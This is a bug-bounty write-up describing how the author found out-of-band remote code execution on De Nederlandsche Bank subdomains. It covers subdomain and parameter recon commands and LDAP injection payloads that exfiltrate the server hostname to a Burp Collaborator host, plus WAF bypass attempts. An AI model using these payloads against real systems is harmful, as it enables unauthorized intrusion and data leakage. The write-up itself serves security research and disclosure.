Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator

Hi, everyone

My name is Santosh Kumar Sha, I’m a Security Researcher/Ethical Hacker from India(Assam). In this article, I will be describing How I found Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL Note:

Don’t go outside test scope without any permission. Stay safe and also hack safe . Special request to my fellow bug-bounty hunter Take care of your health and always abide the rule of engagement.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

5. Burpsuite — https://portswigger.net/burp

Story Behind the bug:

This is the write-up of my how i found Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator is on different domains with fuzzing parameters at a same time. So, while casually browsing and exploring the main domain where i notice an endpoint where it was accepting an input so enter an payload but due to waf it was not simple to executed the command on the server.

Here it goes:

Suppose we assume the target name is dnb.nl where every thing is in-scope like this:

In-scope : *.dnb.nl

To gather all the subdomain from internet archives i have used subfinder , waybackurls tool and gau.

Command used:

subfinder -d dnb.nl silent

gau -subs dnb.nl

waybackurls dnb.nl

So the chance of missing the subdomain still exist so in-order to be ahead of the game I don’t want to miss any subdomain for testing so I used subfinder and pipe to waybackurls to get all the domain for all the subdomain if exist and save it to a file.

So the final command will look like this:

gau -subs dnb.nl | unfurl domains>> vul1.txt

waybackurls dnb.nl| unfurl domains >> vul2.txt

subfinder -d dnb.nl -silent >> vul3.txt

Now collecting all subdomain in one and sorting out the duplicates

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt

As, if now i have collect all the unique domain and stored them on “unique_sub.txt”

Now Creating customer word-list for fuzzing the parameter:

gau -subs dnb.nl | grep “=” | sed ‘s/.*.?//’ | sed ‘s/&/\n/’ | sed ‘s/=.*//’ >> param1.txt

waybackurls dnb.nl | grep “=” | sed ‘s/.*.?//’ | sed ‘s/&/\n/’ | sed ‘s/=.*//’ | sort -u >> param2.txt

cat param1.txt param2.txt | sort -u >> param.txt

As, if now i have collect all the unique parameters and stored them on “param.txt”

Now I have unique domain and customer parameter for fuzzing.

NOW the actual hunting start how I achieved Out of Bond RCE :

So while playing around the endpoint on burp repeater I have across an parameter was accepting input but when i was injected the RCE payload it was blocked by WAF and also with encoding the special character which was very hard to bypass.
I tried multiple encoding and decoding technique to bypass this and also tried multiple WAF bypass payloads and some custom payload but no success. It very was hard to bypass the waf and encoding to trigger the RCE.

So, After trying everything I thought why out try Out-of-Bond remote code execution to extract command run on back-end and rally it on any other server to bypass the WAF.

So, as I don’t any third part domain or server to rally the respond. Here’s how burp collaborator come handy while testing the using. I used but payload using curl, ping and nslookup command using burp collaborator server but no success. But, sudden I remember that it they where using ldap.

So, I finally tried the payload as “ ldap://test.<burp collaborator_server>” and fortunately i received the dns pingback.

But inorder proof the RCE i decided to escalate and to fetch the response from server for the command executed on the server.Now, I tried the last payload to fetch the rce command output that was executed on the server.

“ ldap://${hostname}.<burp collaborator_server>”

Burpsuite Process:

Using This method I was able to multiple Out-Of-Bond Remote code Execution(RCE) with burp-suite collaborator using burp-suite intruder. I reported all the issue in single report and as ALL issue were same because of same root cause, so was reward once only.

Moral For Story:

Use burp-suite as automation tools because its unlimited power to offer and also you don’t need an programming knowledge for it, just you need to know how to use it.

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach for found Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator.

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.
LinkedIn Profile: https://www.linkedin.com/in/santoshlegend12tech/

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!